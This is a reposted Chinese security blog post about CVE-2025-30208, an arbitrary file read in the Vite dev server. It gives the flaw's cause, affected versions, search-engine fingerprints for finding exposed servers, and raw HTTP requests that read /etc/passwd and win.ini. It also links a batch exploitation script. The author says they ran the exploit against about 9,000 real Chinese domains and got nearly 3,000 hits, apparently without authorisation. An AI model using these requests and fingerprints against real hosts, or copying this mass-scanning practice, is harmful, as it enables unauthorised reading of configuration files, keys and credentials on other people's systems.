前言
这个CVE-2025-30208资产真的巨多,而且出货量也高。
几天前的晚上,我就全部跑了一遍了,导出了12635条中国域名资产,总共大概跑了9000多条,出了大概快3000了,出货量很高,详情请看下文
漏洞信息
CVE-2025-30208是Vite开发服务器中存在的一个高危逻辑漏洞,允许攻击者通过构造特殊的URL绕过文件访问限制,读取服务器上的任意文件(如配置文件、密钥、数据库凭据等)。该漏洞的利用条件需满足两点:开发服务器通过--host或server.host配置暴露至网络(非默认配置),且使用受影响版本的Vite由于Vite广泛应用于Vue、React等主流前端框架,潜在影响范围涉及数十万级资产。
漏洞原理
漏洞源于Vite在处理URL查询参数时的逻辑缺陷。当请求路径包含特定参数(**如?raw??或?import&raw??**)时,Vite对URL尾部分隔符(如?和&)的正则匹配不严格,导致安全检查被绕过。例如,攻击者可构造类似/@fs/etc/passwd?raw??
的请求,利用@fs机制(本用于访问项目允许列表内的文件)读取系统敏感文件官方修复方案通过正则表达式/[?&]+$/
移除URL末尾的冗余分隔符,从而阻断绕过路径。
漏洞POC
漏洞特征
fofa&&quake
body="/@vite/client"
鹰图Hunter
web.body="/@vite/client"
影响范围
-
6.2.0 <= Vite <= 6.2.2 -
6.1.0 <= Vite <= 6.1.1 -
6.0.0 <= Vite <= 6.0.11 -
5.0.0 <= Vite <= 5.4.14 -
Vite <= 4.5.9
POC
Linux下
GET /@fs/etc/passwd?import&raw?? HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept: */*
Connection: Keep-Alive
window下
GET /@fs/C://windows/win.ini?import&raw?? HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept: */*
Connection: Keep-Alive
注意再进行关键字搜索:以Linux举例
The server is configured with a public base URL of
有一些非常有好的提示,告诉我们路径错了,应该安装它这样注意在进行指定https搜索
plain HTTP request
总共大概跑了9000多条,出了大概快3000了,出货量很高,不过修的也是真的快,估计修了一半多了
批量检测脚本
项目地址
https://github.com/ThumpBo/CVE-2025-30208-EXP
原文始发于微信公众号(泷羽Sec-尘宇安全):CVE-2025-30208,资产巨多(中国域名资产:12635+),附POC+批量检测脚本
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论